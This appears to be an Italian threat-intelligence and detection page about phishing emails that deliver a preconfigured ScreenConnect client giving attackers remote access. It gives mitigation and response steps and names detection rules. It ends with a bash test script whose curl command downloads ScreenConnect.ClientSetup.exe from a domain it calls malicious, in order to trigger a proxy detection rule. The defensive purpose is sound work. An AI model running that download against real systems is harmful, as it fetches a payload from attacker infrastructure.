SOC Prime Bias: Medium

05 Oct 2026 17:02 UTC

Client ScreenConnect usato in modo improprio per consentire l’accesso remoto non autorizzato

Author Photo
SOC Prime Team linkedin icon Segui
Client ScreenConnect usato in modo improprio per consentire l’accesso remoto non autorizzato
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Sommario

Gli aggressori stanno utilizzando email di phishing per distribuire un client ScreenConnect legittimo e preconfigurato. Lo strumento di Monitoraggio e Gestione Remota (RMM) stabilisce una connessione di ritorno a un’istanza controllata dall’attaccante, fornendo accesso remoto ai sistemi compromessi. La campagna sfrutta la natura affidabile del software legittimo per eludere i controlli di sicurezza di base e i meccanismi di rilevamento.

Indagine

L’investigatore ha esaminato un’email di phishing contenente un link che consegnava un file PE. L’analisi ha confermato che il file era un client ScreenConnect legittimo con firma digitale. Tuttavia, la sua configurazione incorporata era stata modificata per connettersi a una specifica istanza di relay e ID istanza controllati dall’attore malintenzionato.

Mitigazione

I browser possono bloccare i download di file eseguibili come primo livello di protezione. Le organizzazioni dovrebbero monitorare l’uso non autorizzato degli strumenti RMM e applicare controlli rigidi sugli eseguibili scaricati da link web non attendibili. Anche il whitelisting delle applicazioni può aiutare a prevenire che client ScreenConnect non autorizzati e altri software RMM non approvati vengano eseguiti.

Risposta

Quando viene rilevata un’attività dannosa, isolare il punto finale interessato per impedire l’accesso remoto continuo da parte dell’attaccante. Identificare e terminare eventuali processi ScreenConnect attivi. Effettuare una revisione forense della configurazione del client per identificare l’infrastruttura di comando e controllo dell’attaccante e determinare l’entità dell’accesso non autorizzato al sistema compromesso.

Flusso di attacco

Stiamo ancora aggiornando questa parte.

Rilevamenti

Software di Accesso Remoto / Gestione Alternativo (tramite process_creation)

Team SOC Prime
05 ott 2026

Possibile Attività di Comando e Controllo di Comunicazione Tentato dal Dominio del Software di Accesso Remoto (tramite dns)

Team SOC Prime
05 ott 2026

Distribuzione Malware Client ScreenConnect tramite Email di Phishing [Proxy HTTP]

Regole AI SOC Prime
05 ott 2026

Esecuzione Simulazione

  • Narrazione e Comandi dell’Attacco: L’avversario mira a stabilire la persistenza su una workstation bersaglio distribuendo ScreenConnect tramite una campagna di phishing. In questa simulazione, replichiamo la fase finale: la macchina della vittima effettua una richiesta HTTP in uscita a un dominio compromesso/maligno per scaricare l’eseguibile di installazione. Per imitare il comportamento specifico identificato nell’intelligence sulla minaccia, l'”attaccante” utilizza una stringa User-Agent personalizzata ScreenConnect mentre richiede il percorso file specifico thelittlecupandsaucer.com.au/ScreenConnect.ClientSetup.exe. Questo attiverà la regola di rilevamento basata su proxy.

  • Script di Test di Regressione:

    # Questo script utilizza curl per imitare la richiesta di download dannosa identificata nella regola di rilevamento.
    # Utilizza l'URL specifico e l'User-Agent specifico necessari per attivare l'allerta.
    
    TARGET_URL="http://thelittlecupandsaucer.com.au/ScreenConnect.ClientSetup.exe"
    MALICIOUS_UA="ScreenConnect"
    
    echo "[*] Simulazione del tentativo di download di ScreenConnect..."
    echo "[*] URL: $TARGET_URL"
    echo "[*] User-Agent: $MALICIOUS_UA"
    
    # Usiamo -k per ignorare errori SSL se il dominio simulato utilizza un cert auto-firmato, 
    # e -A per impostare lo User-Agent specifico.
    curl -k -A "$MALICIOUS_UA" "$TARGET_URL" -o /dev/null
    
    echo "[*] Comando di simulazione inviato."
  • Comandi di Pulizia:

    # Nessun file è stato effettivamente scaricato sull'host nella simulazione (reindirizzato a /dev/null).
    # Nessuna modifica di sistema è stata fatta.
    echo "[*] Pulizia completata. Nessuna traccia lasciata sull'host."